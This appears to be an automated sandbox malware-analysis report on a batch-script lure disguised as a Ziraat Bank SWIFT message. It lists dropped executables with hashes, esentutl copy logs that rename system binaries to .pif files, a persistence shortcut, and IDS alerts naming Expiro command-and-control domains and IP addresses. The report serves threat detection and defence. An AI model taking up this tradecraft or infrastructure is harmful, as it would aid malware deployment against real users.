                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18944
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.379540626579189
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:BWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:BLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6FC9D6C4B59B9854B6FA4C5858A872DF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4A7108215B0DD5BE96B3D0D398866CE557463F94
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F5CDE8D7DED71060D874E4A9A0E0409BD7FAC176A04C9FBEAF5D7F7737152438
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C753C577665F9F7BAF154C00CD8F2294B7B971576A788E028E383A876A52E24C4014BA9354630E5115056F4394D2179839F7B465C049453D82CFC03DD448A164
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.680690579464684
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.98220267790633
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:N8HCrgl+WOXqnJnb2FuTIZ8LsiCizVXQdA4dmTZGsRkOiume2XF+65pZ+60Ifeb:ii2OXq/IUDdxvYmTZNSUmnv00eb
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B228D350632CCC48F8985E2B4831DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1E8CCD439102B45EA52F54A1E975752C9CFEF677
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A81D3E00FF3DC7450DCF2CE888AD6BB508F45C6B51622680BCD664C860C0A006
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0588E1D37901031A4C3692A3FC826FB829CE2379AB9A504447EDEF73378A4A30B22AE93CBAD35D0C5E7AFDD907BF4DB5DAF87C091A8A4BC3523D49A1A3834030
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):665670656
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999999373899194
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EE8B7DECEB50DD1F1A36C5BC2B9B0250
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DDB384E52B08F4A1F32BAF2E006D8B12DC1320B2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CAC81AC319FF195EAB640679F3CA99E3F8F93228DC1B02703741F07A532E17A5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A78DDC165C80683A09B55153BA54A3ED660F53B877F6823735A06601809F941FE8F52F54694A772547CDE4DF293B8A9ED608AFCF152CFF19535B0C6296D4E2D2
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1832
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.5529084750238744
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:8nsXMlykXG/tz0/CSL4WWeMNDyWlT9ZVJQ17+AUcZvclayJQ17+Ad/CNfBn/v4tK:8srxWLqeMNmG9LuR9ZvcLuRZ2Fdqy
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B265F584BC5BA0D9042584A3F6C455DB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:17CA0B09C70800E71C780D9271D7ECDEEA1142CE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B7850E54DA9C9B5D59369B0FC2E1E1FDCDC19336302EBD7ADF571B58010B298
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AB5D16E954A5427E0E0430895D461F8FEAF1FD7FD5EE630A5DCDF74FD671D45FCDD37903DBB86FE49423C26DB8C4D9EA77F32A35B2780D74EF55B0B82C0089CE
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@......................................................=....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.6.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%SystemDrive%\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe....................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.253733103660469
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FQW4qoNUgslKNX0Ip0MgHCpoMBOuBsqjnhMgeiCl7G0nehbGZpbD:FQW9BKNX0IPgiKMBOuVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7CB21DCAD3B21967F4E5DF9CF3F75EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CE1978724850F471C93A8FA32E3D15CEC08F27CB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:057CF201051EFB43E652A6648F4B2BBD250884871022A35A3C606C0D97E13B51
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1550C02872113A9E4A2983A8C156F48FFC6862889CA16F2C96308E0FDBE69BE55BDD57976A7423B9352891A40F802743B726EF4356F00F5EF0BD3C50FB025F0D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163545111098871
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:u2G7AbHjkOsqjnhMgeiCl7G0nehbGZpbD:u2G7AbHj3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E00165FE54F19D1DEEEEFC021D118FF2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A572D14C5481EF3EBDCDA1961972984D510206C3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09828FEC239E18720A9DA2E777C586BA7D58915FDC3311696D3AC338E388770B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D62A9425547576ADB58173ACDF846F917F5723F3FE8B3A2CD52C8D1043310177A06A2057CAD44067EC7C9803B3C9E297643FAB6386679E7371DCD73BAEB3F385
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.2889313283218
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hkdpSI+K3S/GWei+qNv2uG3GsqjnhMgeiCl7G0nehbGZpbD:h6SIGGWei2uG3KDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8C4572ABE5A5F57DFA8806CCF85CB414
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:979C0F0A473103B182A25269CCF7A19470A874D4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:497746349A513645094828FEDF0795F5BD9AB83D7F4BA88FB5E9A687DDC36EAC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:529DD0FC05A230E7EACB2EDB62D87AABF1BF54A5DDA61779E7C90A2A4CFF75CBA44309D6BCD10FC3434077F38BCD429108CF8D4301EC842633B86DCFBABCC505
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163298507277617
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:nEP3R6bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:s6bsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:39868E9AD4918B18A6AD00C9FF3BE84E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2AE518AB5B6822DBAA824F57E45DD87EEAF8034E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:904EB2819A94929059A78B511A0340039DADB8A923D5575A4A37CBDEBBC9D897
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ADCC90903D95F4E3C8DE5C7D994BDDE3F0B37E6D380A3AA10144435D27E47F1E4DD355CE145D7087DBAA3761075F1CA709848B8A6BFDB0655F98EBD4880CAFE6
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.985444392774893
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:zIRSa9cFUraS92bXaoDuqxp80pxN2pfMgo3BsERsEVrIecSBkOYp+9MMTwVwJpz:8UEc3SUblHO012pfMgeGY6SeMM/C
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:82482AFB5673C89E3C7D3206647560FF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5B4191E5E3A10407FD69CF5EF35D6282D1091020
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:87EECAE2AC2E246E7E49BC6DBF0CCC18FC6CF91D333A448AC125F1B07297FBB0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2961A1F253837B4CC4B25B64ACBF2AB2496E18B113CA5459819A59AF14DA942A55A1E9202540032E12F19E3A4F6C4C37C3C5056571C4D74A96253F5550C5EC1D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.623913469564284
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qzBBVmXxTzmBzeSbZ7u0wxDDDDDDDDjCaY5e9aYAV/TB8NGNTI:iBB0XxTzkzp7u0wQake9aT/t8Nb
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8912B76089305211B68DD61738BE4F92
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:19A9527FB3D4A818102A3788BBC6B01545D3D381
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:755CE474174DE728A6B44280797E70107A80FBCE7913CA8DCB19FD2B92F4884C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AD2F50A2ADA26942B5C9B719A21B49F664FDB6665221F984D2122E336CEB166D36013D63925F3247B4EFE2F4F9F41F8434F4A60034EE1F8AE21A1DB4F496A4B4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b600 (1226240) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.110 seconds.....
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):560
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.531408806270406
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGN2FI:/p4xT5cp7u0wQakB4aV4t8N0
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EE7187E169AF0EDE104977788ECC390D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5A796ECD0808A540F708BFA4C43FF5295B324F23
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2E0D33DC849A7490058C38486E17F33365411663130ABCBDBA5A2293646B07CB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:53ED16BD667612A24E5840B86902ABCE2E4C2B22471CBE3923490448719CE1F0D48DCD2D8DF38F66F572C4EE39CFE5C52190BBDD2B3237F5C38CE556C2ED8C8D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.47 seconds.....
                                                                                                                                                                                                                                                                                                                                                                                                                                    File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.761002854360995
                                                                                                                                                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                                      File name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:3'381'962 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:5f351f07b94613764a8bc09970bbcd58
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:47fcfcac926a0007010b7afb776671d2276b8b81
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256:2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512:49ddfcc8f58117ec824e35b1a2bf6928cf580e4337a8f9aa1d7d4dc62a6e93bb811702d0ed2c970f1f0a08b013ffc5ba6dcc6951c6d59f9a0d7915c3b9f3baae
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:/EldPvpS3bi8Kz95FnA8S21f063u9vsk/ZkSgR+lY1Q7FZU1n9dJCNUeE1Zperr8:/ARo3biB55HSwTBvfbb
                                                                                                                                                                                                                                                                                                                                                                                                                                      TLSH:C7F511A33ECD15CA1B0A7797DF4BE7148A5B8C1C1BA27D8442D30D4879272CB95E0ADB
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Content Preview:COMCOM@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....
                                                                                                                                                                                                                                                                                                                                                                                                                                      Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T09:56:12.974837+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 198.252.105.91 | 443 | TCP
2024-11-18T09:56:51.616371+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.7 | 49883 | TCP
2024-11-18T09:56:51.616371+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.7 | 49883 | TCP
2024-11-18T09:56:53.165851+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49888 | TCP
2024-11-18T09:56:53.165851+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49888 | TCP
2024-11-18T09:56:55.358034+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.7 | 49906 | TCP
2024-11-18T09:56:55.358034+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.7 | 49906 | TCP
2024-11-18T09:56:55.359429+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 59465 | 1.1.1.1 | 53 | UDP
2024-11-18T09:56:57.035382+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49914 | 54.244.188.177 | 80 | TCP
2024-11-18T09:56:57.079419+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 50501 | 1.1.1.1 | 53 | UDP
2024-11-18T09:56:58.704311+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 60092 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:01.012200+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 50248 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:29.842892+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 54567 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:31.231494+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 54507 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:33.379985+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 50011 | TCP
2024-11-18T09:57:33.379985+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 50011 | TCP
2024-11-18T09:57:35.196947+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.7 | 50013 | TCP
